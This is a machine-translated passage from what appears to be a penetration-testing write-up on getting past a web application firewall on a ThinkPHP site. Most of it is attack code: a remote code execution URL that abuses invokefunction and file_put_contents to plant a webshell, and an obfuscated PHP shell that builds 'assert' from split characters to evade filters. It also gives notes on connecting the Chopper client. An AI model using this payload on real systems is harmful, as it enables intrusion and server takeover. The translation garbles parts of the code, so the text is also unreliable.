We can see directly stopped, tested here is a sensitive function of character interception, most useful sensitive functions are stopped, there is to be stopped phpinfo ()
Emmmm, how to do it. . . . .
Direct execution of code does not work, then write code for it, write with file_put_contents () function.
But there is a problem here, because the normal write request parameters will be the same with the sensitive character bar, and use pony when calling sensitive functions will be stopped
So too with the black dot technology, the use of special colt, plus three times URL encoding
url:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc);
$ = $ Poc_2 poc_1 [0]. $ Poc_1 [1]. $ Poc_1 [2]. $ Poc_1 [3]. $ Poc_1 [4]. $ Poc_1 [5]; $ poc_2 (UrlDecode (UrlDecode (UrlDecode ($ _ REQUEST [ '12345']))));
?>
pony:
<?php
$poc ="axsxsxexrxt";
$ Poc_1 = explode ( "x" $ bit);
$ = $ Poc_2 poc_1 [0]. $ Poc_1 [1]. $ Poc_1 [2]. $ Poc_1 [3]. $ Poc_1 [4]. $ Poc_1 [5];
$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));
?>
The value to be three times URL encryption
C knife original configuration:
PHP_MAKE three url parameter encrypted and provided to the request header
